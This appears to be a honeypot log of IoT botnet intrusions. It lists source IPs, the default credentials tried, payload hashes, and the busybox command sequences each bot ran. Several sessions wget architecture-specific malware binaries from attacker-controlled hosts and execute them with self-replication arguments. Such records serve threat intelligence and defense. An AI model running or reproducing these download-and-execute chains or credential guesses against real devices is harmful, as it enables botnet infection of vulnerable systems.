| IP address |
User name |
Password |
SHA256 of the payload file |
 188.213.165.43
| root | jvbzd | e4d6f8639e2f5cb3644223e739242d2e6d8f7cc2ddfb652ef4782b8ffd983e2c |
sh
..
linuxshell
shell
enable
system
hostname SEFA_ID:8383
/bin/busybox SEFA
/bin/busybox ps; /bin/busybox SEFA
/bin/busybox cat /proc/mounts; /bin/busybox SEFA
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SEFA
cd /
/bin/busybox cp /bin/echo sefaexecbi; >sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
/bin/busybox cat /bin/echo
/bin/busybox SEFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://188.213.165.43:80/hakka/helios.x86 -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi x86; /bin/busybox AFES
/bin/busybox SEFA |
 45.148.10.86
| 2323 | | 46116fd3040233dea2df53efd38121ae88691c8804bafa38c81352cb08889c0e |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .xxx666 s2m
/bin/busybox cp /bin/busybox .xxx666; >.xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://45.148.10.86:80/dafuqman111/gh0st0a1s0as2d12.arm -O - > .xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
./.xxx666 selfrep.arm; /bin/busybox ELBATSNU
/bin/busybox rm -rf s2m .xxx666
/bin/busybox cp /bin/busybox .xxx666; >.xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://45.148.10.86:80/dafuqman111/gh0st0a1s0as2d12.arm7 -O - > .xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
./.xxx666 selfrep.arm7; /bin/busybox ELBATSNU
/bin/busybox rm -rf s2m; >.xxx666; /bin/busybox UNSTABLE |
45.148.10.86 | daemon | | badc7bab8236100ff21c9211842d84fb7f4d4e4c281dc793d253ba193100357d |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .xxx666 s2m
/bin/busybox cp /bin/busybox .xxx666; >.xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://45.148.10.86:80/dafuqman111/gh0st0a1s0as2d12.spc -O - > .xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
./.xxx666 selfrep.spc; /bin/busybox ELBATSNU
/bin/busybox rm -rf s2m; >.xxx666; /bin/busybox UNSTABLE |
45.148.10.86 | default | OxhlwSG8 | 82a4e8a4d7778afbbc93d88f2fa3f1f0cc34b5613c9727a8be3ca807c63ec781 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .xxx666 s2m
/bin/busybox cp /bin/busybox .xxx666; >.xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://45.148.10.86:80/dafuqman111/gh0st0a1s0as2d12.ppc -O - > .xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
./.xxx666 selfrep.ppc; /bin/busybox ELBATSNU
/bin/busybox rm -rf s2m; >.xxx666; /bin/busybox UNSTABLE |
45.148.10.197 | daemon | | b7259bef9674a973bc88edc795b4e42c63c7d94096689549496b3a51de4048e0 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .06 sikeriz
/bin/busybox cp /bin/busybox .06; >.06; /bin/busybox chmod 777 .06; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://45.148.10.197:80/x0ox0ox0oxDefault/z0r0.m68k -O - > .06; /bin/busybox chmod 777 .06; /bin/busybox UNSTABLE
./.06 selfrep.m68k; /bin/busybox ELBATSNU
/bin/busybox rm -rf sikeriz; >.06; /bin/busybox UNSTABLE |
45.148.10.86 | root | iwkb | 46116fd3040233dea2df53efd38121ae88691c8804bafa38c81352cb08889c0e |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .xxx666 s2m
/bin/busybox cp /bin/busybox .xxx666; >.xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://45.148.10.86:80/dafuqman111/gh0st0a1s0as2d12.arm -O - > .xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
./.xxx666 selfrep.arm; /bin/busybox ELBATSNU
/bin/busybox rm -rf s2m .xxx666
/bin/busybox cp /bin/busybox .xxx666; >.xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://45.148.10.86:80/dafuqman111/gh0st0a1s0as2d12.arm7 -O - > .xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
./.xxx666 selfrep.arm7; /bin/busybox ELBATSNU
/bin/busybox rm -rf s2m; >.xxx666; /bin/busybox UNSTABLE |
 108.174.198.206
| support | 123456 | 92c9de0d91b405d9702a2ef0545d30a0ba717647260a3a30ebd4a4de0275b3ae |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf BzSxLxBxeY sandjew
/bin/busybox cp /bin/busybox BzSxLxBxeY; >BzSxLxBxeY; /bin/busybox chmod 777 BzSxLxBxeY; /bin/busybox OWARI
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox OWARI
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox OWARI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox OWARI
/bin/busybox wget http://108.174.198.206:80/bins/owari.arm -O - > BzSxLxBxeY; /bin/busybox chmod 777 BzSxLxBxeY; /bin/busybox OWARI
./BzSxLxBxeY loader.wget; /bin/busybox WICKED
/bin/busybox rm -rf sandjew BzSxLxBxeY
/bin/busybox cp /bin/busybox BzSxLxBxeY; >BzSxLxBxeY; /bin/busybox chmod 777 BzSxLxBxeY; /bin/busybox OWARI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox OWARI
/bin/busybox wget http://108.174.198.206:80/bins/owari.arm7 -O - > BzSxLxBxeY; /bin/busybox chmod 777 BzSxLxBxeY; /bin/busybox OWARI
./BzSxLxBxeY loader.wget; /bin/busybox WICKED
/bin/busybox rm -rf sandjew; >BzSxLxBxeY; /bin/busybox OWARI |
192.236.155.224 | fliruser | 3vlig | f6d35c116be73e219002e62025bfb24e9226c5979e9a6a4513495f14de362597 |
sh
..
linuxshell
shell
enable
system
hostname SEFA_ID:0051
/bin/busybox SEFA
/bin/busybox ps; /bin/busybox SEFA
/bin/busybox cat /proc/mounts; /bin/busybox SEFA
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SEFA
cd /
/bin/busybox cp /bin/echo sefaexecbi; >sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
/bin/busybox cat /bin/echo
/bin/busybox SEFA
cat /proc/cpuinfo; uname -m; /bin/busybox SEFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://192.236.155.225:80/hakka/helios.arm -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi arm; /bin/busybox AFES
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://192.236.155.225:80/hakka/helios.arm7 -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi arm7; /bin/busybox AFES
/bin/busybox SEFA |